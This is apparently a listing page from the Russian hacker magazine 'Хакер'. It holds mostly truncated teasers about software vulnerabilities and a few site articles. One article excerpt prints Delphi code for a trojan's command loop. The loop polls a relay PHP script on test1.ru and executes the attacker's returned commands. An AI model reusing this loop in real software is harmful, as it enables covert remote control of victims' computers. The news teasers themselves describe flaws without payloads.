Софт

Новости

SQL-инъекция в ASPjar GuestBook

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существ…

Новости

Небезопасное хранение базы данных в ListPics

Уязвимость позволяет удаленному пользователю скачать базу данных приложения. Приложение хранит файл базы данных в доступной …

Новости

Небезопасное хранение паролей в Access Remote PC

Уязвимость позволяет локальному пользователю заполучить пароли пользователей Access Remote PC. Уязвимость существует из-за т…

Новости

Обход каталога в Quick & Dirty PHP Source Printer

Уязвимость позволяет удаленному пользователю получить просмотреть произвольные файлы на системе. Уязвимость существует из-за…

Новости

Удаленное выполнение произвольных команд в GlobalNoteScript

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе с привилегиями web сервера. У…

Новости

Небезопасное создание временных файлов в Log4sh

Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует в функции log4sh_rea…

Материалы сайта

Будущее по Гейтсу: веб-сервисы и распознавание речи

Веб-службы решительным образом скажутся на разработке программного обеспечения, распознавание речи станет главным направлением в общении с компьютеров в ближайшие три или четыре года, поисковики станут более полноценными и простыми в обращении - такой прогноз дал всеми нами любимый Билл Гейтс на проходящее в Сингапуре конференции разработчиков

Новости

Троян сажает в мобильниках батарею

Смартфонам угрожает новая напасть. Троянская программа под видом игры Doom 2 проникает в устройство и заражает его деструкти…

Новости

SQL-инъекция и выполнение локальных файлов в osTicket

Уязвимость позволяет удаленному пользователю выполнить локальные файлы и произвольные SQL команды в базе данных приложения. …

Новости

DoS в браузере K-Meleon

Уязвимость позволяет удаленному пользователю аварийно завершить работу браузера. Удаленный пользователь может с помощью спец…

Новости

Отказ в обслуживании в TCP Chat

Уязвимость позволяет удаленному пользователю вызвать аварийное завершение работы приложения. Удаленный пользователь может по…

Материалы сайта

Registry Viewer 4.2

Cредство просмотра файлов реестра Win9x/Me/NT/2K/XP.

Новости

Выполнение произвольных программ и раскрытие информации в JBoss jBPM

Обнаруженные уязвимости позволяют удаленному пользователю получить потенциально важные данные и выполнить произвольные прило…

Новости

Mozilla продолжит существование под названием SeaMonkey

Стало известно об организации нового проекта - SeaMonkey Project, - который продолжит разработку набора открытых продуктов M…

Новости

Раскрытие соединения с базой в phpBB (эксплоит)

В phpBB 2.0.15 через Viewtopic дает просмотреть все параметры соединения с базой данных - хост, пользователь, пароль.

Новости

XSS в phpBB

Для версия <=2.0.16.

Новости

Лучшие вирусы Июня

Компания «Лаборатория Касперского» опубликовала очередной рейтинг вирусных программ. Вирусным антигероем первого месяца лета…

Новости

Microsoft предупреждает о неисправленной ошибке в IE

Microsoft предупредила об уязвимости Internet Explorer после того, как аналитическая фирма опубликовала действующий эксплойт…

Новости

Множественные уязвимости в Cacti

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, обойт…

Новости

PHP-инклюдинг в Nabopoll

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе с привилегиями web серве…

Новости

Обход каталога и раскрытие установочной директории в Golden FTP Server

Уязвимость позволяет удаленному авторизованному пользователю получить доступ к потенциально важным данным на системе. Удален…

Новости

Отказ в обслуживании в Microsoft Front Page

Уязвимость позволяет удаленному пользователю аварийно завершить работу приложения. Удаленный пользователь может создать HTML…

Новости

SQL-инъекция в Simple Machines Forum

Новости

HTTP Request Smuggling атака в различных proxy и web серверах

Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку (атаку со скрытым HTTP запросом), и отр…

Новости

Отказ в обслуживании в браузере Netscape

Уязвимость позволяет удаленному пользователю вызвать аварийное завершение работы браузера. Уязвимость существует при обработ…

Новости

DoS в аудио системе NetBSD

Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы. Локальный пользователь может вызвать функ…

Новости

Обход ограничений безопасности в Prevx Pro

Обнаруженная уязвимость позволяет локальному пользователю обойти механизм защиты от изменения данных и подделать сообщения о…

Новости

Выполнение произвольных команд в Community Link Pro

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Уязвимость существует в сцен…

Материалы сайта

Digest аутентификация в PHP

Ограничение доступа к какой-либо области сайта обычно выглядит однообразно: каждому пользователю выдается логин и пароль или он сам их выбирает, и для входа в защищенную часть сайта их нужно ввести. С технической же точки зрения для проверки пароля используются разные методы

Материалы сайта

mp3DirectCut 2.01

омпактная утилита для прямого редактирования MP3-файлов: позволяет обрезать тишину в начале и/или конце файла, нормализировать звук, а также плавно убирать его в конце композиции, обьединять файлы, редактировать ID3-тэги и записывать Mp3 непосредственно на диск - без декомпрессии в PCM-формат ( поддерживаются кодеки ACM и LAME).

Новости

Небезопасное хранение закрытого ключа в SSH Tectia Server

Уязвимость позволяет локальному пользователю заполучить получить доступ к зарытому ключу. Уязвимость существует из-за некорр…

Новости

DoS в cabinet.dll и утилите makecab.exe

В Библиотеке сжатия cabinet.dll и в утилите makecab.exe обнаружена уязвимость. Во время сжатия файла с любым именем и содерж…

Новости

Обход фильтрации ipfw в FreeBSD

Уязвимость позволяет удаленному пользователю обойти фильтрацию пакетов. Уязвимость существует при включенной опции PREEMPTIO…

Новости

Отказ в обслуживании в реализации TCP стека во FreeBSD

Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании.

Новости

Отказ в обслуживании в Clam AntiVirus

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании системы.

Новости

Обход аутентификации в Cisco IOS RADIUS

Уязвимость позволят удаленному пользователю обойти аутентификацию и получить неавторизованный доступ к ресурсам сети. Уязвим…

Новости

Удаленная перезагрузка устройств с Symbian OS (эксплоит)

Мобильные устройства на основе Symbian OS с поддержкой Bluetooth могут быть удаленно перезагружены простой передачей специал…

Новости

Выполнение произвольного PHP сценария в phpBB (эксплоит)

Уязвимость в viewtopic.php в версиях до 2.0.15.

Материалы сайта

Управление трояном через скрипт-посредник №2

Код, реализующий это, выглядит так: // сначала запрос пустой request:=''; // цикл работы трояна while true do begin // отсылаем скрипту запрос if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then begin // если отослать не удалось - ждём минуту и крутим следующую итерацию sleep(1000*SEC); continue; end; // если отослать удалось - проверим answer if (answer='') then begin // команд от хакера нет - очистим reques, // ждём минуту и крутим следующую итерацию request:=''; sleep(1000*SEC); continue; end; // если управление дошло сюда - в answer у нас команда хакера // выполняем команду request:=DoCommand(answer); end; Здесь answer и request у нас глобальные переменные типа AnsiString

Новости

Автор DeCSS снова с утилитой

Йон Лех Йохансен, автор программы DeCSS для обхода защиты от копирования DVD-дисков, выложил на своем веб-сайте "патч", поср…

Бумажный выпуск

Еженедельный дайджест

Партнерам

«Хакер» в соцсетях

Материалы для подписчиков